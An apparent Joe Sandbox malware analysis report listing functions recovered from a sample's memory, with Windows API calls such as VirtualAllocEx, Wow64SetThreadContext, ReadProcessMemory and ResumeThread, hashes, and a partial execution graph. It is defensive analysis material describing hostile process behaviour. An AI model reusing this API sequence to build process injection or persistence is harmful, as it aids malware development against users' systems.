            • Snapshot File: hcaresult_9_2_a240000_bmkNCLNkqvOpVZ.jbxd
            Similarity
            • API ID: ContextThreadWow64
            • String ID:
            • API String ID: 983334009-0
            • Opcode ID: 5d8e4ad25522d14b6793421cc87e736ab3857b98d95766be2651d4b247d6d940
            • Instruction ID: 128a057982cafd11df5b41fdd124ea1fabf93aef4f1f55704d9f0fe9fadf4ab3
            • Opcode Fuzzy Hash: 5d8e4ad25522d14b6793421cc87e736ab3857b98d95766be2651d4b247d6d940
            • Instruction Fuzzy Hash: AA216A719003098FDB14DFAAC4817EEBBF4AF88320F148429D559A7240DB789944CF90
            Function 014AA170 Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON
            Download Yara Rule
            APIs
            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,014AB079,00000800,00000000,00000000), ref: 014AB68A
            Memory Dump Source
            • Source File: 00000009.00000002.2152448143.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_14a0000_bmkNCLNkqvOpVZ.jbxd
            Similarity
            • API ID: LibraryLoad
            • String ID:
            • API String ID: 1029625771-0
            • Opcode ID: 71e2830523bc489cbdfc0b19b986c1f32ef3facb7a1acc7ad55b136cbcbb972b
            • Instruction ID: 016edb03218b0a9b127df40dda4d7405baa74a80ee81c1557f794d4bab6567f2
            • Opcode Fuzzy Hash: 71e2830523bc489cbdfc0b19b986c1f32ef3facb7a1acc7ad55b136cbcbb972b
            • Instruction Fuzzy Hash: C32157B28042498FDB10CFAAC844ADEBFF4EB58320F55805ED518A7210D775A404CFA5
            Function 0A243A60 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
            Download Yara Rule
            APIs
            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0A243ADE
            Memory Dump Source
            • Source File: 00000009.00000002.2158329955.000000000A240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A240000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_a240000_bmkNCLNkqvOpVZ.jbxd
            Similarity
            • API ID: ContextThreadWow64
            • String ID:
            • API String ID: 983334009-0
            • Opcode ID: 9e94c69f062634be4be20ddd06f822d3b686270766538a31f1a0420335857099
            • Instruction ID: 9cfdafb7ef97564a844957d24d503bbfc5fc9d34e2092c0df80414301c191810
            • Opcode Fuzzy Hash: 9e94c69f062634be4be20ddd06f822d3b686270766538a31f1a0420335857099
            • Instruction Fuzzy Hash: 952149719103098FDB14CFAAC4857EEBBF4EF88324F14842AD519A7240DB78A944CFA5
            Function 0A243CE8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
            Download Yara Rule
            APIs
            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0A243D68
            Memory Dump Source
            • Source File: 00000009.00000002.2158329955.000000000A240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A240000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_a240000_bmkNCLNkqvOpVZ.jbxd
            Similarity
            • API ID: MemoryProcessRead
            • String ID:
            • API String ID: 1726664587-0
            • Opcode ID: 8ef5f7ff70745bb327688dd9edad84e4edd1188ca730db58883f468d29c18911
            • Instruction ID: 995068d484ca1505c7c743af23c492de460bbdd6eb37809aafb2e9a61e6db808
            • Opcode Fuzzy Hash: 8ef5f7ff70745bb327688dd9edad84e4edd1188ca730db58883f468d29c18911
            • Instruction Fuzzy Hash: FF2116B18007499FDB10CFAAC881ADEBBF5FF48320F50842AE518A7240D7789910CBA5
            Function 014AD688 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
            Download Yara Rule
            APIs
            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 014AD70F
            Memory Dump Source
            • Source File: 00000009.00000002.2152448143.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_14a0000_bmkNCLNkqvOpVZ.jbxd
            Similarity
            • API ID: DuplicateHandle
            • String ID:
            • API String ID: 3793708945-0
            • Opcode ID: 2c36d45ac5951b6efdec6882cb2e3552ffbc443b92dd444ddabc0188f0d48c90
            • Instruction ID: 1521aba6dab28878ee84dce7a74fcfeb66f4da8c630210f6337476e82357c11c
            • Opcode Fuzzy Hash: 2c36d45ac5951b6efdec6882cb2e3552ffbc443b92dd444ddabc0188f0d48c90
            • Instruction Fuzzy Hash: 7021E4B5D002499FDB10CF9AD984ADEBFF4FB48320F14801AE914A7310D374A950CF60
            Function 014AD681 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
            Download Yara Rule
            APIs
            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 014AD70F
            Memory Dump Source
            • Source File: 00000009.00000002.2152448143.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_14a0000_bmkNCLNkqvOpVZ.jbxd
            Similarity
            • API ID: DuplicateHandle
            • String ID:
            • API String ID: 3793708945-0
            • Opcode ID: a9ce42ecc86a92742a58d822122a915308a69f9d5f8f93f42882e670199816a5
            • Instruction ID: 12ef58723624efc5efcd9e315612cdfc1c5b2355b7f29c974cbe3ff96e5734bd
            • Opcode Fuzzy Hash: a9ce42ecc86a92742a58d822122a915308a69f9d5f8f93f42882e670199816a5
            • Instruction Fuzzy Hash: D821E0B9D002499FDB10CFAAD984ADEBBF4FB48320F14841AE918A7350D378A950CF60
            Function 0A242938 Relevance: 1.6, APIs: 1, Instructions: 57windowCOMMON
            Download Yara Rule
            APIs
            • PostMessageW.USER32(?,00000010,00000000,?), ref: 0A2470A5
            Memory Dump Source
            • Source File: 00000009.00000002.2158329955.000000000A240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A240000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_a240000_bmkNCLNkqvOpVZ.jbxd
            Similarity
            • API ID: MessagePost
            • String ID:
            • API String ID: 410705778-0
            • Opcode ID: 9c04700048e05ae33b79df7cdc3bf785e8b7ef25a14ae3f89f4008f0112f7c70
            • Instruction ID: 9eb32652a0319e3f9eb8529dee37434a8f06ec7cb89998841688e2a11a841e8a
            • Opcode Fuzzy Hash: 9c04700048e05ae33b79df7cdc3bf785e8b7ef25a14ae3f89f4008f0112f7c70
            • Instruction Fuzzy Hash: B31144B18193898FDB21DF99C884BDEBFF8EB49320F14849AD554A7211C3B86944CFA1
            Function 014AA188 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
            Download Yara Rule
            APIs
            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,014AB079,00000800,00000000,00000000), ref: 014AB68A
            Memory Dump Source
            • Source File: 00000009.00000002.2152448143.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_14a0000_bmkNCLNkqvOpVZ.jbxd
            Similarity
            • API ID: LibraryLoad
            • String ID:
            • API String ID: 1029625771-0
            • Opcode ID: d57af6ea056c190c6295278ba418c352d9b08c32d8b7ebb6e8f823a7b4d34c9e
            • Instruction ID: 3a1f9ee8c00414305f5a26094d95c057d54535546131482f933aabfd6876a3ce
            • Opcode Fuzzy Hash: d57af6ea056c190c6295278ba418c352d9b08c32d8b7ebb6e8f823a7b4d34c9e
            • Instruction Fuzzy Hash: 751103B68002499FDB10CF9AC444BDEFBF4EB98320F51852AE519A7210C375A545CFA5
            Function 0A243B30 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
            Download Yara Rule
            APIs
            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0A243BA6
            Memory Dump Source
            • Source File: 00000009.00000002.2158329955.000000000A240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A240000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_a240000_bmkNCLNkqvOpVZ.jbxd
            Similarity
            • API ID: AllocVirtual
            • String ID:
            • API String ID: 4275171209-0
            • Opcode ID: 94b119e1af43c80d18241323de770a26258b4a90fe30f71d39a0bee29bc21372
            • Instruction ID: 5898b49353e2d77b90484e77dc127a538aeaa7aea9f4e030440ed4959d80a153
            • Opcode Fuzzy Hash: 94b119e1af43c80d18241323de770a26258b4a90fe30f71d39a0bee29bc21372
            • Instruction Fuzzy Hash: F01147728002499FDF10DFA9C845BEEBFF5AF88320F14841DE515AB250CB759914CF91
            Function 0A243B38 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
            Download Yara Rule
            APIs
            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0A243BA6
            Memory Dump Source
            • Source File: 00000009.00000002.2158329955.000000000A240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A240000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_a240000_bmkNCLNkqvOpVZ.jbxd
            Similarity
            • API ID: AllocVirtual
            • String ID:
            • API String ID: 4275171209-0
            • Opcode ID: 1889c7998c264487385d6cb1fec8cbc2d4f6fd237c04b9902985bcba63bc2f1c
            • Instruction ID: 90bb9a0204bbe0cdf2775abd08a06f77d6900d4bcc10226cce9b853b7e42a8de
            • Opcode Fuzzy Hash: 1889c7998c264487385d6cb1fec8cbc2d4f6fd237c04b9902985bcba63bc2f1c
            • Instruction Fuzzy Hash: 2F1156728002499FDF10DFAAC845BDEBBF5AF88320F108419E519A7250CB75A910CFA0
            Function 014AB619 Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON
            Download Yara Rule
            APIs
            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,014AB079,00000800,00000000,00000000), ref: 014AB68A
            Memory Dump Source
            • Source File: 00000009.00000002.2152448143.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_14a0000_bmkNCLNkqvOpVZ.jbxd
            Similarity
            • API ID: LibraryLoad
            • String ID:
            • API String ID: 1029625771-0
            • Opcode ID: 59317aaba8d28092961ba8f4ad486f4ec2efe4b7a490936487e63d004b07f7da
            • Instruction ID: 02e534d79500662d0d8f8977ee23d1d6678a5539c215150206faa0255da89501
            • Opcode Fuzzy Hash: 59317aaba8d28092961ba8f4ad486f4ec2efe4b7a490936487e63d004b07f7da
            • Instruction Fuzzy Hash: F2111FB6C002498FDB14CFAAC584BEEFBF4EB58320F54852AD529A7210C378A545CFA5
            Function 0A2439A9 Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 00000009.00000002.2158329955.000000000A240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A240000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_a240000_bmkNCLNkqvOpVZ.jbxd
            Similarity
            • API ID: ResumeThread
            • String ID:
            • API String ID: 947044025-0
            • Opcode ID: 43fba741dfbf684008ddeed2a5a046cec6b60095c2460ef2a204aa0e8e1fbcb5
            • Instruction ID: 05817f49a321fd5b8548dda9712e9fe0dda3c389b31897dbbe33d970fbaad7b9
            • Opcode Fuzzy Hash: 43fba741dfbf684008ddeed2a5a046cec6b60095c2460ef2a204aa0e8e1fbcb5
            • Instruction Fuzzy Hash: FE1158B19003498FDB24DFAAC4457EEFBF4AF88320F24842AD119A7240CB79A940CB94
            Function 0A2439B0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 00000009.00000002.2158329955.000000000A240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A240000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_a240000_bmkNCLNkqvOpVZ.jbxd
            Similarity
            • API ID: ResumeThread
            • String ID:
            • API String ID: 947044025-0
            • Opcode ID: 4839a20a459cf91a29931742917692cab1838f1d5364d3741406509909c0b505
            • Instruction ID: f6c7229b91d111eba9b63d3cb655e08bdd52b0c7e92585f5b379f7821ad1af37
            • Opcode Fuzzy Hash: 4839a20a459cf91a29931742917692cab1838f1d5364d3741406509909c0b505
            • Instruction Fuzzy Hash: 101128B19003498FDB14DFAAC44579EFBF4AF88624F248429D519A7240CB79A940CBA5
            Function 0A247041 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON
            Download Yara Rule
            APIs
            • PostMessageW.USER32(?,00000010,00000000,?), ref: 0A2470A5
            Memory Dump Source
            • Source File: 00000009.00000002.2158329955.000000000A240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A240000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_a240000_bmkNCLNkqvOpVZ.jbxd
            Similarity
            • API ID: MessagePost
            • String ID:
            • API String ID: 410705778-0
            • Opcode ID: 55a541283112e76169a29761efdb15aa5e49f1aefc0256959dd31a21f850b20f
            • Instruction ID: 3b615db6f8abeb52058e10226bee206b369d1b76f6fb3f92729a7b49d072b0a5
            • Opcode Fuzzy Hash: 55a541283112e76169a29761efdb15aa5e49f1aefc0256959dd31a21f850b20f
            • Instruction Fuzzy Hash: 8711F2B58103499FDB10DF99C485BEEBFF4FB48324F20845AD529A7610C3B5A944CFA1
            Function 014AAF98 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
            Download Yara Rule
            APIs
            • GetModuleHandleW.KERNELBASE(00000000), ref: 014AAFFE
            Memory Dump Source
            • Source File: 00000009.00000002.2152448143.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_14a0000_bmkNCLNkqvOpVZ.jbxd
            Similarity
            • API ID: HandleModule
            • String ID:
            • API String ID: 4139908857-0
            • Opcode ID: c53be906837a3fa49175fd8c47a0dbdc78b111303b63ca277fd833b43f682d0a
            • Instruction ID: 60e1bfa9ab4de4766af8c5dd80a8bf6a931fd27a0dbf00d1e4512344eab86749
            • Opcode Fuzzy Hash: c53be906837a3fa49175fd8c47a0dbdc78b111303b63ca277fd833b43f682d0a
            • Instruction Fuzzy Hash: D4110FB6C006498FDB24CF9AC444B9EFBF4EB88224F10842AD529A7310D379A545CFA1
            Function 0A242928 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
            Download Yara Rule
            APIs
            • PostMessageW.USER32(?,00000010,00000000,?), ref: 0A2470A5
            Memory Dump Source
            • Source File: 00000009.00000002.2158329955.000000000A240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A240000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_a240000_bmkNCLNkqvOpVZ.jbxd
            Similarity
            • API ID: MessagePost
            • String ID:
            • API String ID: 410705778-0
            • Opcode ID: 1271982383be9232684623667246431da06c7b30b3ec46a31737e70794f2d82f
            • Instruction ID: ac4ab0a786674aeca97443dc3eea4301311332e3a29eeb79e5f72837c31acfc0
            • Opcode Fuzzy Hash: 1271982383be9232684623667246431da06c7b30b3ec46a31737e70794f2d82f
            • Instruction Fuzzy Hash: A31106B5810349DFDB20DF99C485BDEBFF8EB48320F10945AE514A7600D3B5A944CFA1
            Function 014AB6C1 Relevance: 1.5, APIs: 1, Instructions: 44libraryCOMMON
            Download Yara Rule
            APIs
            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,014AB079,00000800,00000000,00000000), ref: 014AB68A
            Memory Dump Source
            • Source File: 00000009.00000002.2152448143.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_14a0000_bmkNCLNkqvOpVZ.jbxd
            Similarity
            • API ID: LibraryLoad
            • String ID:
            • API String ID: 1029625771-0
            • Opcode ID: 84370fdce2d23c74895e0789996d5318acfd3698a143bf4a3c1ff521300bcddd
            • Instruction ID: ef5455981e9e0f6bca0c8714fb009e4a34351b5d7a0f4ff00699ca37b27ef28d
            • Opcode Fuzzy Hash: 84370fdce2d23c74895e0789996d5318acfd3698a143bf4a3c1ff521300bcddd
            • Instruction Fuzzy Hash: 0D018F769043489FDB108FADD804BDABFF4EFA5328F05805BE248D7261C3B99454CBA5
            Function 0114D4C4 Relevance: .1, Instructions: 75COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000009.00000002.2151637110.000000000114D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0114D000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_114d000_bmkNCLNkqvOpVZ.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 0be8a5a2ab88707b9abf8993a00c28bfb6c0f6b0fce78595ba22d5a4914cec2c
            • Instruction ID: 462a2b6b7cbe6d550b375777a9b79c0658e35ee56264ce1240d7184c9687422b
            • Opcode Fuzzy Hash: 0be8a5a2ab88707b9abf8993a00c28bfb6c0f6b0fce78595ba22d5a4914cec2c
            • Instruction Fuzzy Hash: 50212172600240EFDF09DF54E9C0B2ABF71FB98B18F248169E9090E256C736D416CAA2
            Function 0115D1D4 Relevance: .1, Instructions: 72COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000009.00000002.2151707540.000000000115D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0115D000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_115d000_bmkNCLNkqvOpVZ.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 5588bf4f7e54202f988e4ccebb12f942bc8aec8ecd64a317d100f00b4d51c96b
            • Instruction ID: 9a003f8e0fda7f3776b1504e48e165a6beb94a46e9d083cb43175b1f74eceaf1
            • Opcode Fuzzy Hash: 5588bf4f7e54202f988e4ccebb12f942bc8aec8ecd64a317d100f00b4d51c96b
            • Instruction Fuzzy Hash: B1210071504200EFDF49DF94E9C0B26BBA1FB84324F20C56DED0A4B252C776D446CB62
            Function 0115D01C Relevance: .1, Instructions: 72COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000009.00000002.2151707540.000000000115D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0115D000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_115d000_bmkNCLNkqvOpVZ.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 92022ee8907b4dab48697ad6223b7a5362fbc3d47b3c6cce8ccad3bcd4bca541
            • Instruction ID: fb6df7a604040db7e5b9506002cfec23c6a66df5639ae547e3990473a8b8b142
            • Opcode Fuzzy Hash: 92022ee8907b4dab48697ad6223b7a5362fbc3d47b3c6cce8ccad3bcd4bca541
            • Instruction Fuzzy Hash: 72210075604200EFDF59DF54E9C0B26BB61EB84314F20C56DDD1A4B252C77AD407CB62
            Function 0115D006 Relevance: .1, Instructions: 60COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000009.00000002.2151707540.000000000115D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0115D000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_115d000_bmkNCLNkqvOpVZ.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: c99b148c547ddac76684d5c7cd1283fccac8c90842a418cb466938e67ec2a9b7
            • Instruction ID: e41e25ae1c319a0002e67fe6a2cbd45151b88dc9dabf4c4774bfdd97407e4fcc
            • Opcode Fuzzy Hash: c99b148c547ddac76684d5c7cd1283fccac8c90842a418cb466938e67ec2a9b7
            • Instruction Fuzzy Hash: EE21AC75509380CFDB07CF24D990B15BF71EB46214F28C5EAD8498B2A7C33AD80ACB62
            Function 0114D4BF Relevance: .1, Instructions: 56COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000009.00000002.2151637110.000000000114D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0114D000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_114d000_bmkNCLNkqvOpVZ.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
            • Instruction ID: ffc7f8678ed87aa975cb381c7d038445ba5189cfe22dd335b877feff3cd91b60
            • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
            • Instruction Fuzzy Hash: 1411CD76504280CFCF06CF54E5C0B16BF71FB94618F2486A9D8090B256C33AD456CBA2
            Function 0115D1CF Relevance: .1, Instructions: 53COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000009.00000002.2151707540.000000000115D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0115D000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_115d000_bmkNCLNkqvOpVZ.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
            • Instruction ID: 50b85dde4be83f48dddb8d43376c5c0b268678affaab1da8eb4b0c913547dabd
            • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
            • Instruction Fuzzy Hash: 3211BB75504280DFCB06CF54D5C0B15BBA1FB84224F24C6ADDC494B2A6C37AD44ACB62

            Execution Graph

            Execution Coverage:1.8%
            Dynamic/Decrypted Code Coverage:0%
            Signature Coverage:3.5%
            Total number of Nodes:654
            Total number of Limit Nodes:13
            execution_graph 45699 404e06 WaitForSingleObject 45700 404e20 SetEvent FindCloseChangeNotification 45699->45700 45701 404e37 closesocket 45699->45701 45702 404eb8 45700->45702 45703 404e44 45701->45703 45704 404e5a 45703->45704 45712 4050c4 83 API calls 45703->45712 45706 404e6c WaitForSingleObject 45704->45706 45707 404eae SetEvent CloseHandle 45704->45707 45713 41c4c6 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 45706->45713 45707->45702 45709 404e7b SetEvent WaitForSingleObject 45714 41c4c6 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 45709->45714 45711 404e93 SetEvent CloseHandle CloseHandle 45711->45707 45712->45704 45713->45709 45714->45711 45715 40163e 45716 401646 45715->45716 45717 401649 45715->45717 45718 401688 45717->45718 45720 401676 45717->45720 45723 43229f 45718->45723 45721 43229f new 22 API calls 45720->45721 45722 40167c 45721->45722 45725 4322a4 45723->45725 45726 4322d0 45725->45726 45730 439adb 45725->45730 45737 440480 7 API calls 2 library calls 45725->45737 45738 4329bd RaiseException Concurrency::cancel_current_task __CxxThrowException@8 45725->45738 45739 43301b RaiseException Concurrency::cancel_current_task __CxxThrowException@8 45725->45739 45726->45722 45735 443649 ___crtLCMapStringA 45730->45735 45731 443687 45741 43ad91 20 API calls __dosmaperr 45731->45741 45732 443672 RtlAllocateHeap 45734 443685 45732->45734 45732->45735 45734->45725 45735->45731 45735->45732 45740 440480 7 API calls 2 library calls 45735->45740 45737->45725 45740->45735 45741->45734 45742 43263c 45743 432648 ___scrt_is_nonwritable_in_current_image 45742->45743 45768 43234b 45743->45768 45745 43264f 45747 432678 45745->45747 46032 4327ae IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 45745->46032 45754 4326b7 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 45747->45754 46033 441763 5 API calls ___crtLCMapStringA 45747->46033 45749 432691 45751 432697 ___scrt_is_nonwritable_in_current_image 45749->45751 46034 441707 5 API calls ___crtLCMapStringA 45749->46034 45759 432717 45754->45759 46035 4408e7 35 API calls 5 library calls 45754->46035 45779 4328c9 45759->45779 45763 432743 45765 43274c 45763->45765 46036 4408c2 28 API calls _abort 45763->46036 46037 4324c2 13 API calls 2 library calls 45765->46037 45769 432354 45768->45769 46038 4329da IsProcessorFeaturePresent 45769->46038 45771 432360 46039 436cd1 10 API calls 4 library calls 45771->46039 45773 432365 45774 432369 45773->45774 46040 4415bf 45773->46040 45774->45745 45777 432380 45777->45745 46106 434c30 45779->46106 45782 43271d 45783 4416b4 45782->45783 46108 44c239 45783->46108 45785 4416bd 45786 432726 45785->45786 46112 443d25 35 API calls 45785->46112 45788 40d3f0 45786->45788 46114 41a8da LoadLibraryA GetProcAddress 45788->46114 45790 40d40c 46121 40dd83 45790->46121 45792 40d415 46136 4020d6 45792->46136 45795 4020d6 28 API calls 45796 40d433 45795->45796 46142 419d87 45796->46142 45800 40d445 46168 401e6d 45800->46168 45802 40d44e 45803 40d461 45802->45803 45804 40d4b8 45802->45804 46174 40e609 45803->46174 45805 401e45 22 API calls 45804->45805 45807 40d4c6 45805->45807 45811 401e45 22 API calls 45807->45811 45810 40d47f 46189 40f98d 45810->46189 45812 40d4e5 45811->45812 46205 4052fe 45812->46205 45815 40d4f4 46210 408209 45815->46210 45823 40d4a3 45826 401fb8 11 API calls 45823->45826 45828 40d4ac 45826->45828 46027 4407f6 GetModuleHandleW 45828->46027 45829 401fb8 11 API calls 45830 40d520 45829->45830 45831 401e45 22 API calls 45830->45831 45832 40d529 45831->45832 46227 401fa0 45832->46227 45834 40d534 45835 401e45 22 API calls 45834->45835 45836 40d54f 45835->45836 45837 401e45 22 API calls 45836->45837 45838 40d569 45837->45838 45839 40d5cf 45838->45839 46231 40822a 28 API calls 45838->46231 45841 401e45 22 API calls 45839->45841 45846 40d5dc 45841->45846 45842 40d594 45843 401fc2 28 API calls 45842->45843 45844 40d5a0 45843->45844 45847 401fb8 11 API calls 45844->45847 45845 40d650 45851 40d660 CreateMutexA GetLastError 45845->45851 45846->45845 45848 401e45 22 API calls 45846->45848 45849 40d5a9 45847->45849 45850 40d5f5 45848->45850 46232 411f34 RegOpenKeyExA RegQueryValueExA RegCloseKey 45849->46232 45854 40d5fc OpenMutexA 45850->45854 45852 40d987 45851->45852 45853 40d67f 45851->45853 45857 401fb8 11 API calls 45852->45857 45895 40d9ec 45852->45895 45855 40d688 45853->45855 45856 40d68a GetModuleFileNameW 45853->45856 45859 40d622 45854->45859 45860 40d60f WaitForSingleObject CloseHandle 45854->45860 45855->45856 46235 4192ae 33 API calls 45856->46235 45881 40d99a ___scrt_fastfail 45857->45881 46233 411f34 RegOpenKeyExA RegQueryValueExA RegCloseKey 45859->46233 45860->45859 45862 40d5c5 45862->45839 45864 40dd0f 45862->45864 45863 40d6a0 45865 40d6f5 45863->45865 45867 401e45 22 API calls 45863->45867 46265 41239a 30 API calls 45864->46265 45869 401e45 22 API calls 45865->45869 45875 40d6bf 45867->45875 45877 40d720 45869->45877 45870 40dd22 46266 410eda 65 API calls ___scrt_fastfail 45870->46266 45872 40dcfa 45903 40dd6a 45872->45903 46267 402073 28 API calls 45872->46267 45873 40d63b 45873->45845 46234 41239a 30 API calls 45873->46234 45875->45865 45882 40d6f7 45875->45882 45889 40d6db 45875->45889 45876 40d731 45880 401e45 22 API calls 45876->45880 45877->45876 46239 40e501 CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 45877->46239 45888 40d73a 45880->45888 46247 4120e8 RegOpenKeyExA RegQueryValueExA RegCloseKey 45881->46247 46237 411eea RegOpenKeyExA RegQueryValueExA RegCloseKey 45882->46237 45883 40dd3a 46268 4052dd 28 API calls 45883->46268 45894 401e45 22 API calls 45888->45894 45889->45865 46236 4067a0 36 API calls ___scrt_fastfail 45889->46236 45891 40d70d 45891->45865 46238 4066a6 58 API calls 45891->46238 45898 40d755 45894->45898 45899 401e45 22 API calls 45895->45899 45905 401e45 22 API calls 45898->45905 45902 40da10 45899->45902 46248 402073 28 API calls 45902->46248 46269 413980 161 API calls _strftime 45903->46269 45907 40d76f 45905->45907 45910 401e45 22 API calls 45907->45910 45909 40da22 46249 41215f 14 API calls 45909->46249 45912 40d789 45910->45912 45916 401e45 22 API calls 45912->45916 45913 40da38 45914 401e45 22 API calls 45913->45914 45915 40da44 45914->45915 46250 439867 39 API calls _strftime 45915->46250 45919 40d7a3 45916->45919 45918 40d810 45918->45881 45924 401e45 22 API calls 45918->45924 45958 40d89f ___scrt_fastfail 45918->45958 45919->45918 45921 401e45 22 API calls 45919->45921 45920 40da51 45922 40da7e 45920->45922 46251 41aa4f 81 API calls ___scrt_fastfail 45920->46251 45930 40d7b8 _wcslen 45921->45930 46252 402073 28 API calls 45922->46252 45928 40d831 45924->45928 45926 40da70 CreateThread 45926->45922 46521 41b212 10 API calls 45926->46521 45927 40da8d 46253 402073 28 API calls 45927->46253 45933 401e45 22 API calls 45928->45933 45930->45918 45936 401e45 22 API calls 45930->45936 45931 40da9c 46254 4194da 79 API calls 45931->46254 45934 40d843 45933->45934 45940 401e45 22 API calls 45934->45940 45935 40daa1 45937 401e45 22 API calls 45935->45937 45938 40d7d3 45936->45938 45939 40daad 45937->45939 45942 401e45 22 API calls 45938->45942 45943 401e45 22 API calls 45939->45943 45941 40d855 45940->45941 45946 401e45 22 API calls 45941->45946 45944 40d7e8 45942->45944 45945 40dabf 45943->45945 46240 40c5ed 31 API calls 45944->46240 45949 401e45 22 API calls 45945->45949 45948 40d87e 45946->45948 45954 401e45 22 API calls 45948->45954 45951 40dad5 45949->45951 45950 40d7fb 46241 401ef3 28 API calls 45950->46241 45957 401e45 22 API calls 45951->45957 45953 40d807 46242 401ee9 11 API calls 45953->46242 45956 40d88f 45954->45956 46243 40b871 46 API calls _wcslen 45956->46243 